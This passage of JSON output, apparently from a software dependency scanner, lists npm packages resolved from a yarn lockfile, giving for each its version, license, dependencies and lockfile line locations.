"EndLine": 10876 } ], "AnalyzedBy": "yarn" }, { "ID": "universalify@2.0.1", "Name": "universalify", "Identifier": { "PURL": "pkg:npm/universalify@2.0.1", "UID": "e90a3a8bd11f7549" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10878, "EndLine": 10881 } ], "AnalyzedBy": "yarn" }, { "ID": "unpipe@1.0.0", "Name": "unpipe", "Identifier": { "PURL": "pkg:npm/unpipe@1.0.0", "UID": "2ec2f7ad6e092be1" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10883, "EndLine": 10886 } ], "AnalyzedBy": "yarn" }, { "ID": "update-browserslist-db@1.1.3", "Name": "update-browserslist-db", "Identifier": { "PURL": "pkg:npm/update-browserslist-db@1.1.3", "UID": "a978c45da4e056a5" }, "Version": "1.1.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "escalade@3.2.0", "picocolors@1.1.1" ], "Locations": [ { "StartLine": 10888, "EndLine": 10894 } ], "AnalyzedBy": "yarn" }, { "ID": "use-latest-callback@0.2.5", "Name": "use-latest-callback", "Identifier": { "PURL": "pkg:npm/use-latest-callback@0.2.5", "UID": "16915f32992d4b43" }, "Version": "0.2.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10903, "EndLine": 10906 } ], "AnalyzedBy": "yarn" }, { "ID": "use-sync-external-store@1.6.0", "Name": "use-sync-external-store", "Identifier": { "PURL": "pkg:npm/use-sync-external-store@1.6.0", "UID": "f430a609b7c0e20e" }, "Version": "1.6.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10908, "EndLine": 10911 } ], "AnalyzedBy": "yarn" }, { "ID": "utf8@3.0.0", "Name": "utf8", "Identifier": { "PURL": "pkg:npm/utf8@3.0.0", "UID": "8d39721178e4bcc4" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10913, "EndLine": 10916 } ], "AnalyzedBy": "yarn" }, { "ID": "util@0.12.5", "Name": "util", "Identifier": { "PURL": "pkg:npm/util@0.12.5", "UID": "e631e86ac727e320" }, "Version": "0.12.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "inherits@2.0.4", "is-arguments@1.2.0", "is-generator-function@1.1.2", "is-typed-array@1.1.15", "which-typed-array@1.1.19" ], "Locations": [ { "StartLine": 10928, "EndLine": 10937 } ], "AnalyzedBy": "yarn" }, { "ID": "util-deprecate@1.0.2", "Name": "util-deprecate", "Identifier": { "PURL": "pkg:npm/util-deprecate@1.0.2", "UID": "f4cc801c9053ce08" }, "Version": "1.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10923, "EndLine": 10926 } ], "AnalyzedBy": "yarn" }, { "ID": "utils-merge@1.0.1", "Name": "utils-merge", "Identifier": { "PURL": "pkg:npm/utils-merge@1.0.1", "UID": "a50b98c8be3da15e" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10939, "EndLine": 10942 } ], "AnalyzedBy": "yarn" }, { "ID": "utrie@1.0.2", "Name": "utrie", "Identifier": { "PURL": "pkg:npm/utrie@1.0.2", "UID": "1ee8c4fcc413306" }, "Version": "1.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "base64-arraybuffer@1.0.2" ], "Locations": [ { "StartLine": 10944, "EndLine": 10949 } ], "AnalyzedBy": "yarn" }, { "ID": "uuid@3.4.0", "Name": "uuid", "Identifier": { "PURL": "pkg:npm/uuid@3.4.0", "UID": "aa933471abfe8c0f" }, "Version": "3.4.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10951, "EndLine": 10954 } ], "AnalyzedBy": "yarn" }, { "ID": "uuid@7.0.3", "Name": "uuid", "Identifier": { "PURL": "pkg:npm/uuid@7.0.3", "UID": "5a74fe9a4bc16ef4" }, "Version": "7.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10956, "EndLine": 10959 } ], "AnalyzedBy": "yarn" }, { "ID": "validate-npm-package-license@3.0.4", "Name": "validate-npm-package-license", "Identifier": { "PURL": "pkg:npm/validate-npm-package-license@3.0.4", "UID": "fb633a0c60501108" }, "Version": "3.0.4", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "spdx-correct@3.2.0", "spdx-expression-parse@3.0.1" ], "Locations": [ { "StartLine": 10978, "EndLine": 10982 } ], "AnalyzedBy": "yarn" }, { "ID": "validate-npm-package-name@6.0.2", "Name": "validate-npm-package-name", "Identifier": { "PURL": "pkg:npm/validate-npm-package-name@6.0.2", "UID": "2deace2ff33ecc2e" }, "Version": "6.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10984, "EndLine": 10985 } ], "AnalyzedBy": "yarn" }, { "ID": "vlq@1.0.1", "Name": "vlq", "Identifier": { "PURL": "pkg:npm/vlq@1.0.1", "UID": "9a71092536a69488" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10992, "EndLine": 10995 } ], "AnalyzedBy": "yarn" }, { "ID": "walk-up-path@4.0.0", "Name": "walk-up-path", "Identifier": { "PURL": "pkg:npm/walk-up-path@4.0.0", "UID": "fd40f837a9de5ff7" }, "Version": "4.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10997, "EndLine": 11000 } ], "AnalyzedBy": "yarn" }, { "ID": "walker@1.0.8", "Name": "walker", "Identifier": { "PURL": "pkg:npm/walker@1.0.8", "UID": "f36e07a208c2174a" }, "Version": "1.0.8", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "makeerror@1.0.12" ], "Locations": [ { "StartLine": 11002, "EndLine": 11007 } ], "AnalyzedBy": "yarn" }, { "ID": "warn-once@0.1.1", "Name": "warn-once", "Identifier": { "PURL": "pkg:npm/warn-once@0.1.1", "UID": "73b0f8f66f9aba35" }, "Version": "0.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 11009, "EndLine": 11012 } ], "AnalyzedBy": "yarn" }, { "ID": "wcwidth@1.0.1", "Name": "wcwidth", "Identifier": { "PURL": "pkg:npm/wcwidth@1.0.1", "UID": "7772ed5c0fefe034" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "defaults@1.0.4" ], "Locations": [ { "StartLine": 11014, "EndLine": 11019 } ], "AnalyzedBy": "yarn" }, { "ID": "web-vitals@4.2.4", "Name": "web-vitals", "Identifier": { "PURL": "pkg:npm/web-vitals@4.2.4", "UID": "7240e0e3843c191b" }, "Version": "4.2.4", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 11021, "EndLine": 11024 } ], "AnalyzedBy": "yarn" }, { "ID": "websocket-driver@0.7.4", "Name": "websocket-driver", "Identifier": { "PURL": "pkg:npm/websocket-driver@0.7.4", "UID": "c2dd1465a3e8a25e" }, "Version": "0.7.4", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "http-parser-js@0.5.10", "safe-buffer@5.2.1", "websocket-extensions@0.1.4" ], "Locations": [ { "StartLine": 11026, "EndLine": 11033 } ], "AnalyzedBy": "yarn" }, { "ID": "websocket-extensions@0.1.4", "Name": "websocket-extensions", "Identifier": { "PURL": "pkg:npm/websocket-extensions@0.1.4", "UID": "a2259059ec216ce6" }, "Version": "0.1.4", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 11035, "EndLine": 11038 } ], "AnalyzedBy": "yarn" }, { "ID": "websql@2.0.3", "Name": "websql", "Identifier": { "PURL": "pkg:npm/websql@2.0.3", "UID": "6d93f7d26f8072c0" }, "Version": "2.0.3", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "argsarray@0.0.1", "immediate@3.3.0", "noop-fn@1.0.0", "tiny-queue@0.2.1" ], "Locations": [ { "StartLine": 11040, "EndLine": 11050 } ], "AnalyzedBy": "yarn" }, { "ID": "whatwg-fetch@3.6.20", "Name": "whatwg-fetch", "Identifier": { "PURL": "pkg:npm/whatwg-fetch@3.6.20", "UID": "3431059cdf0c13f" }, "Version": "3.6.20", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 11052, "EndLine": 11055 } ], "AnalyzedBy": "yarn" }, { "ID": "which@2.0.2", "Name": "which", "Identifier": { "PURL": "pkg:npm/which@2.0.2", "UID": "334194cdd694f77c" }, "Version": "2.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "isexe@2.0.0" ], "Locations": [ { "StartLine": 11115, "EndLine": 11120 } ], "AnalyzedBy": "yarn" }, { "ID": "which@5.0.0", "Name": "which", "Identifier": { "PURL": "pkg:npm/which@5.0.0", "UID": "ec43aa4d4fb51128" }, "Version": "5.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "isexe@3.1.1" ], "Locations": [ { "StartLine": 11122, "EndLine": 11125 } ], "AnalyzedBy": "yarn" }, { "ID": "which-typed-array@1.1.19", "Name": "which-typed-array", "Identifier": { "PURL": "pkg:npm/which-typed-array@1.1.19", "UID": "11729a652496d784" }, "Version": "1.1.19", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "available-typed-arrays@1.0.7", "call-bind@1.0.8", "call-bound@1.0.4", "for-each@0.3.5", "get-proto@1.0.1", "gopd@1.2.0", "has-tostringtag@1.0.2" ], "Locations": [ { "StartLine": 11102, "EndLine": 11113 } ], "AnalyzedBy": "yarn" }, { "ID": "wide-align@1.1.5", "Name": "wide-align", "Identifier": { "PURL": "pkg:npm/wide-align@1.1.5", "UID": "a699b13841d8b59f" }, "Version": "1.1.5", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "string-width@4.2.3" ], "Locations": [ { "StartLine": 11127, "EndLine": 11132 } ], "AnalyzedBy": "yarn" }, { "ID": "wrap-ansi@7.0.0", "Name": "wrap-ansi", "Identifier": { "PURL": "pkg:npm/wrap-ansi@7.0.0", "UID": "bfd64715b1b2b538" }, "Version": "7.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ansi-styles@4.3.0", "string-width@4.2.3", "strip-ansi@6.0.1" ], "Locations": [ { "StartLine": 11157, "EndLine": 11164 } ], "AnalyzedBy": "yarn" }, { "ID": "wrap-ansi@8.1.0", "Name": "wrap-ansi", "Identifier": { "PURL": "pkg:npm/wrap-ansi@8.1.0", "UID": "1d9838213bbd039e" }, "Version": "8.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ansi-styles@6.2.3", "string-width@5.1.2", "strip-ansi@7.1.2" ], "Locations": [ { "StartLine": 11166, "EndLine": 11173 } ], "AnalyzedBy": "yarn" }, { "ID": "wrap-ansi-cjs@7.0.0", "Name": "wrap-ansi-cjs", "Identifier": { "PURL": "pkg:npm/wrap-ansi-cjs@7.0.0", "UID": "d415b6d02ef3ffef" }, "Version": "7.0.0", "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ansi-styles@4.3.0", "string-width@4.2.3", "strip-ansi@6.0.1" ], "Locations": [ { "StartLine": 11139, "EndLine": 11146 } ], "AnalyzedBy": "yarn" }, { "ID": "wrappy@1.0.2", "Name": "wrappy", "Identifier": { "PURL": "pkg:npm/wrappy@1.0.2", "UID": "b441b106b06717fe" }, "Version": "1.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 11175, "EndLine": 11178 } ], "AnalyzedBy": "yarn" }, { "ID": "write-file-atomic@4.0.2", "Name": "write-file-atomic", "Identifier": { "PURL": "pkg:npm/write-file-atomic@4.0.2", "UID": "3945b8e8e726b05e" }, "Version": "4.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "imurmurhash@0.1.4", "signal-exit@3.0.7" ], "Locations": [ { "StartLine": 11180, "EndLine": 11186 } ], "AnalyzedBy": "yarn" }, { "ID": "write-file-atomic@6.0.0", "Name": "write-file-atomic", "Identifier": { "PURL": "pkg:npm/write-file-atomic@6.0.0", "UID": "2cc9f64f07af98e5" }, "Version": "6.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "imurmurhash@0.1.4", "signal-exit@4.1.0" ], "Locations": [ { "StartLine": 11188, "EndLine": 11192 } ], "AnalyzedBy": "yarn" }, { "ID": "ws@6.2.3", "Name": "ws", "Identifier": { "PURL": "pkg:npm/ws@6.2.3", "UID": "6bc8bbb6f4efc657" }, "Version": "6.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "async-limiter@1.0.1" ], "Locations": [ { "StartLine": 11194, "EndLine": 11199 } ], "AnalyzedBy": "yarn" }, { "ID": "ws@7.5.10", "Name": "ws", "Identifier": { "PURL": "pkg:npm/ws@7.5.10", "UID": "cbdf22169dab72fa" }, "Version": "7.5.10", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 11206, "EndLine": 11209 } ], "AnalyzedBy": "yarn" }, { "ID": "x-path@0.0.2", "Name": "x-path", "Identifier": { "PURL": "pkg:npm/x-path@0.0.2", "UID": "879cf060769f5acd" }, "Version": "0.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "path-extra@1.0.3" ], "Locations": [ { "StartLine": 11211, "EndLine": 11216 } ], "AnalyzedBy": "yarn" }, { "ID": "xcode@2.1.0", "Name": "xcode", "Identifier": { "PURL": "pkg:npm/xcode@2.1.0", "UID": "fdcdd0439d73c36f" }, "Version": "2.1.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "simple-plist@1.3.1", "uuid@3.4.0" ], "Locations": [ { "StartLine": 11218, "EndLine": 11224 } ], "AnalyzedBy": "yarn" }, { "ID": "xcode@3.0.1", "Name": "xcode", "Identifier": { "PURL": "pkg:npm/xcode@3.0.1", "UID": "3fbc9f1d62de060f" }, "Version": "3.0.1", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "simple-plist@1.3.1", "uuid@7.0.3" ], "Locations": [ { "StartLine": 11226, "EndLine": 11232 } ], "AnalyzedBy": "yarn" }, { "ID": "xml-formatter@3.6.7", "Name": "xml-formatter", "Identifier": { "PURL": "pkg:npm/xml-formatter@3.6.7", "UID": "3fcb0a0573491034" }, "Version": "3.6.7", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "xml-parser-xo@4.1.5" ], "Locations": [ { "StartLine": 11234, "EndLine": 11239 } ], "AnalyzedBy": "yarn" }, { "ID": "xml-parser-xo@4.1.5", "Name": "xml-parser-xo", "Identifier": { "PURL": "pkg:npm/xml-parser-xo@4.1.5", "UID": "de8efffd34d25cbb" }, "Version": "4.1.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 11241, "EndLine": 11244 } ], "AnalyzedBy": "yarn" }, { "ID": "xml2js@0.6.0", "Name": "xml2js", "Identifier": { "PURL": "pkg:npm/xml2js@0.6.0", "UID": "3b0713791c0c4a59" }, "Version": "0.6.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "sax@1.4.1", "xmlbuilder@11.0.1" ], "Locations": [ { "StartLine": 11246, "EndLine": 11252 } ], "AnalyzedBy": "yarn" }, { "ID": "xmlbuilder@11.0.1", "Name": "xmlbuilder", "Identifier": { "PURL": "pkg:npm/xmlbuilder@11.0.1", "UID": "2d523124ce0ad32f" }, "Version": "11.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 11259, "EndLine": 11262 } ], "AnalyzedBy": "yarn" }, { "ID": "xmlbuilder@15.1.1", "Name": "xmlbuilder", "Identifier": { "PURL": "pkg:npm/xmlbuilder@15.1.1", "UID": "3b4c1d9bddb5a559" }, "Version": "15.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 11254, "EndLine": 11257 } ], "AnalyzedBy": "yarn" }, { "ID": "y18n@5.0.8", "Name": "y18n", "Identifier": { "PURL": "pkg:npm/y18n@5.0.8", "UID": "b7e5476537afc9b9" }, "Version": "5.0.8", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 11269, "EndLine": 11272 } ], "AnalyzedBy": "yarn" }, { "ID": "yallist@3.1.1", "Name": "yallist", "Identifier": { "PURL": "pkg:npm/yallist@3.1.1", "UID": "425be8eac1de9db9" }, "Version": "3.1.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 11274, "EndLine": 11277 } ], "AnalyzedBy": "yarn" }, { "ID": "yallist@4.0.0", "Name": "yallist", "Identifier": { "PURL": "pkg:npm/yallist@4.0.0", "UID": "128600f1dca3d5ef" }, "Version": "4.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 11279, "EndLine": 11282 } ], "AnalyzedBy": "yarn" }, { "ID": "yallist@5.0.0", "Name": "yallist", "Identifier": { "PURL": "pkg:npm/yallist@5.0.0", "UID": "5bd8c594790f2b10" }, "Version": "5.0.0", "Licenses": [ "BlueOak-1.0.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 11284, "EndLine": 11285 } ], "AnalyzedBy": "yarn" }, { "ID": "yaml@2.8.1", "Name": "yaml", "Identifier": { "PURL": "pkg:npm/yaml@2.8.1", "UID": "a31a701f2d1ece72" }, "Version": "2.8.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 11287, "EndLine": 11290 } ], "AnalyzedBy": "yarn" }, { "ID": "yargs@16.2.0", "Name": "yargs", "Identifier": { "PURL": "pkg:npm/yargs@16.2.0", "UID": "8bda249fb9d6b48e" }, "Version": "16.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "cliui@7.0.4", "escalade@3.2.0", "get-caller-file@2.0.5", "require-directory@2.1.1", "string-width@4.2.3", "y18n@5.0.8", "yargs-parser@20.2.9" ], "Locations": [ { "StartLine": 11332, "EndLine": 11343 } ], "AnalyzedBy": "yarn" }, { "ID": "yargs@17.7.2", "Name": "yargs", "Identifier": { "PURL": "pkg:npm/yargs@17.7.2", "UID": "87a0138afb1109f7" }, "Version": "17.7.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "cliui@8.0.1", "escalade@3.2.0", "get-caller-file@2.0.5", "require-directory@2.1.1", "string-width@4.2.3", "y18n@5.0.8", "yargs-parser@21.1.1" ], "Locations": [ { "StartLine": 11345, "EndLine": 11356 } ], "AnalyzedBy": "yarn" }, { "ID": "yargs-parser@20.2.9", "Name": "yargs-parser", "Identifier": { "PURL": "pkg:npm/yargs-parser@20.2.9", "UID": "752a914d17b416e4" }, "Version": "20.2.9", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 11305, "EndLine": 11308 } ], "AnalyzedBy": "yarn" }, { "ID": "yargs-parser@21.1.1", "Name": "yargs-parser", "Identifier": { "PURL": "pkg:npm/yargs-parser@21.1.1", "UID": "e0e858e4becd4c8" }, "Version": "21.1.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 11310, "EndLine": 11313 } ], "AnalyzedBy": "yarn" }, { "ID": "yocto-queue@0.1.0", "Name": "yocto-queue", "Identifier": { "PURL": "pkg:npm/yocto-queue@0.1.0", "UID": "7ba71225ac1aa6ca" }, "Version": "0.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 11358, "EndLine": 11361 } ], "AnalyzedBy": "yarn" }, { "ID": "@gar/promisify@1.1.3", "Name": "@gar/promisify", "Identifier": { "PURL": "pkg:npm/%40gar/promisify@1.1.3", "UID": "ccc2d7f6bf953133" }, "Version": "1.1.3", "Licenses": [ "MIT" ], "Locations": [ { "StartLine": 1548, "EndLine": 1551 } ], "AnalyzedBy": "yarn" }, { "ID": "@npmcli/fs@1.1.1", "Name": "@npmcli/fs", "Identifier": { "PURL": "pkg:npm/%40npmcli/fs@1.1.1", "UID": "a3eb8c0dce1e341d" }, "Version": "1.1.1", "Licenses": [ "ISC" ], "DependsOn": [ "@gar/promisify@1.1.3", "semver@7.7.3" ], "Locations": [ { "StartLine": 2000, "EndLine": 2006 } ], "AnalyzedBy": "yarn" }, { "ID": "@npmcli/move-file@1.1.2", "Name": "@npmcli/move-file", "Identifier": { "PURL": "pkg:npm/%40npmcli/move-file@1.1.2", "UID": "b5dbe73ce0bdaa8c" }, "Version": "1.1.2", "Licenses": [ "MIT" ], "DependsOn": [ "mkdirp@1.0.4", "rimraf@3.0.2" ], "Locations": [ { "StartLine": 2048, "EndLine": 2054 } ], "AnalyzedBy": "yarn" }, { "ID": "@pkgjs/parseargs@0.11.0", "Name": "@pkgjs/parseargs", "Identifier": { "PURL": "pkg:npm/%40pkgjs/parseargs@0.11.0", "UID": "a29b000cbd87ed12" }, "Version": "0.11.0", "Licenses": [ "MIT" ], "Locations": [ { "StartLine": 2096, "EndLine": 2099 } ], "AnalyzedBy": "yarn" }, { "ID": "@react-native-community/push-notification-ios@1.12.0", "Name": "@react-native-community/push-notification-ios", "Identifier": { "PURL": "pkg:npm/%40react-native-community/push-notification-ios@1.12.0", "UID": "385c7594af72e2d" }, "Version": "1.12.0", "Licenses": [ "MIT" ], "DependsOn": [ "invariant@2.2.4" ], "Locations": [ { "StartLine": 2376, "EndLine": 2381 } ], "AnalyzedBy": "yarn" }, { "ID": "@tootallnate/once@1.1.2", "Name": "@tootallnate/once", "Identifier": { "PURL": "pkg:npm/%40tootallnate/once@1.1.2", "UID": "a9c0266fb34361f" }, "Version": "1.1.2", "Licenses": [ "MIT" ], "Locations": [ { "StartLine": 2837, "EndLine": 2840 } ], "AnalyzedBy": "yarn" }, { "ID": "abbrev@1.1.1", "Name": "abbrev", "Identifier": { "PURL": "pkg:npm/abbrev@1.1.1", "UID": "f64943c30a745dbe" }, "Version": "1.1.1", "Licenses": [ "ISC" ], "Locations": [ { "StartLine": 3172, "EndLine": 3175 } ], "AnalyzedBy": "yarn" }, { "ID": "agent-base@6.0.2", "Name": "agent-base", "Identifier": { "PURL": "pkg:npm/agent-base@6.0.2", "UID": "6ba99e0ff79877c8" }, "Version": "6.0.2", "Licenses": [ "MIT" ], "DependsOn": [ "debug@4.4.3" ], "Locations": [ { "StartLine": 3214, "EndLine": 3219 } ], "AnalyzedBy": "yarn" }, { "ID": "agentkeepalive@4.6.0", "Name": "agentkeepalive", "Identifier": { "PURL": "pkg:npm/agentkeepalive@4.6.0", "UID": "8ccedbc05fce81c7" }, "Version": "4.6.0", "Licenses": [ "MIT" ], "DependsOn": [ "humanize-ms@1.2.1" ], "Locations": [ { "StartLine": 3221, "EndLine": 3226 } ], "AnalyzedBy": "yarn" }, { "ID": "aggregate-error@3.1.0", "Name": "aggregate-error", "Identifier": { "PURL": "pkg:npm/aggregate-error@3.1.0", "UID": "5aba1602e6c0daa1" }, "Version": "3.1.0", "Licenses": [ "MIT" ], "DependsOn": [ "clean-stack@2.2.0", "indent-string@4.0.0" ], "Locations": [ { "StartLine": 3228, "EndLine": 3234 } ], "AnalyzedBy": "yarn" }, { "ID": "are-we-there-yet@3.0.1", "Name": "are-we-there-yet", "Identifier": { "PURL": "pkg:npm/are-we-there-yet@3.0.1", "UID": "3bac295653a18b17" }, "Version": "3.0.1", "Licenses": [ "ISC" ], "DependsOn": [ "delegates@1.0.0", "readable-stream@3.6.2" ], "Locations": [ { "StartLine": 3346, "EndLine": 3352 } ], "AnalyzedBy": "yarn" }, { "ID": "bare-fs@4.4.5", "Name": "bare-fs", "Identifier": { "PURL": "pkg:npm/bare-fs@4.4.5", "UID": "f47e92691969bd6a" }, "Version": "4.4.5", "Licenses": [ "Apache-2.0" ], "DependsOn": [ "bare-events@2.7.0", "bare-path@3.0.0", "bare-stream@2.7.0", "bare-url@2.2.2", "fast-fifo@1.3.2" ], "Locations": [ { "StartLine": 3642, "EndLine": 3651 } ], "AnalyzedBy": "yarn" }, { "ID": "bare-os@3.6.2", "Name": "bare-os", "Identifier": { "PURL": "pkg:npm/bare-os@3.6.2", "UID": "ac528c14ae6b1c1a" }, "Version": "3.6.2", "Licenses": [ "Apache-2.0" ], "Locations": [ { "StartLine": 3653, "EndLine": 3656 } ], "AnalyzedBy": "yarn" }, { "ID": "bare-path@3.0.0", "Name": "bare-path", "Identifier": { "PURL": "pkg:npm/bare-path@3.0.0", "UID": "7f0f0b5991770c96" }, "Version": "3.0.0", "Licenses": [ "Apache-2.0" ], "DependsOn": [ "bare-os@3.6.2" ], "Locations": [ { "StartLine": 3658, "EndLine": 3663 } ], "AnalyzedBy": "yarn" }, { "ID": "bare-stream@2.7.0", "Name": "bare-stream", "Identifier": { "PURL": "pkg:npm/bare-stream@2.7.0", "UID": "904447f6f73d3f7c" }, "Version": "2.7.0", "Licenses": [ "Apache-2.0" ], "DependsOn": [ "streamx@2.23.0" ], "Locations": [ { "StartLine": 3665, "EndLine": 3670 } ], "AnalyzedBy": "yarn" }, { "ID": "bare-url@2.2.2", "Name": "bare-url", "Identifier": { "PURL": "pkg:npm/bare-url@2.2.2", "UID": "5982c8c8569aaa42" }, "Version": "2.2.2", "Licenses": [ "Apache-2.0" ], "DependsOn": [ "bare-path@3.0.0" ], "Locations": [ { "StartLine": 3672, "EndLine": 3677 } ], "AnalyzedBy": "yarn" }, { "ID": "bindings@1.5.0", "Name": "bindings", "Identifier": { "PURL": "pkg:npm/bindings@1.5.0", "UID": "2242a7630ae93d39" }, "Version": "1.5.0", "Licenses": [ "MIT" ], "DependsOn": [ "file-uri-to-path@1.0.0" ], "Locations": [ { "StartLine": 3728, "EndLine": 3733 } ], "AnalyzedBy": "yarn" }, { "ID": "cacache@15.3.0", "Name": "cacache", "Identifier": { "PURL": "pkg:npm/cacache@15.3.0", "UID": "3037619de9081f18" }, "Version": "15.3.0", "Licenses": [ "ISC" ], "DependsOn": [ "@npmcli/fs@1.1.1", "@npmcli/move-file@1.1.2", "chownr@2.0.0", "fs-minipass@2.1.0", "glob@7.2.3", "infer-owner@1.0.4", "lru-cache@6.0.0", "minipass@3.3.6", "minipass-collect@1.0.2", "minipass-flush@1.0.5", "minipass-pipeline@1.2.4", "mkdirp@1.0.4", "p-map@4.0.0", "promise-inflight@1.0.1", "rimraf@3.0.2", "ssri@8.0.1", "tar@6.2.1", "unique-filename@1.1.1" ], "Locations": [ { "StartLine": 3847, "EndLine": 3869 } ], "AnalyzedBy": "yarn" }, { "ID": "chownr@2.0.0", "Name": "chownr", "Identifier": { "PURL": "pkg:npm/chownr@2.0.0", "UID": "37993bf5dd25037a" }, "Version": "2.0.0", "Licenses": [ "ISC" ], "Locations": [ { "StartLine": 3994, "EndLine": 3997 } ], "AnalyzedBy": "yarn" }, { "ID": "clean-stack@2.2.0", "Name": "clean-stack", "Identifier": { "PURL": "pkg:npm/clean-stack@2.2.0", "UID": "4a05d69a57207a36" }, "Version": "2.2.0", "Licenses": [ "MIT" ], "Locations": [ { "StartLine": 4049, "EndLine": 4052 } ], "AnalyzedBy": "yarn" }, { "ID": "color-support@1.1.3", "Name": "color-support", "Identifier": { "PURL": "pkg:npm/color-support@1.1.3", "UID": "979eb97204d778dd" }, "Version": "1.1.3", "Licenses": [ "ISC" ], "Locations": [ { "StartLine": 4186, "EndLine": 4189 } ], "AnalyzedBy": "yarn" }, { "ID": "file-uri-to-path@1.0.0", "Name": "file-uri-to-path", "Identifier": { "PURL": "pkg:npm/file-uri-to-path@1.0.0", "UID": "c9b66031127e05cc" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Locations": [ { "StartLine": 5297, "EndLine": 5300 } ], "AnalyzedBy": "yarn" }, { "ID": "fs-minipass@2.1.0", "Name": "fs-minipass", "Identifier": { "PURL": "pkg:npm/fs-minipass@2.1.0", "UID": "47dafbd7cbefc8a" }, "Version": "2.1.0", "Licenses": [ "ISC" ], "DependsOn": [ "minipass@3.3.6" ], "Locations": [ { "StartLine": 5502, "EndLine": 5507 } ], "AnalyzedBy": "yarn" }, { "ID": "gauge@4.0.4", "Name": "gauge", "Identifier": { "PURL": "pkg:npm/gauge@4.0.4", "UID": "7d249c9773465e8c" }, "Version": "4.0.4", "Licenses": [ "ISC" ], "DependsOn": [ "aproba@1.2.0", "color-support@1.1.3", "console-control-strings@1.1.0", "has-unicode@2.0.1", "signal-exit@3.0.7", "string-width@4.2.3", "strip-ansi@6.0.1", "wide-align@1.1.5" ], "Locations": [ { "StartLine": 5543, "EndLine": 5555 } ], "AnalyzedBy": "yarn" 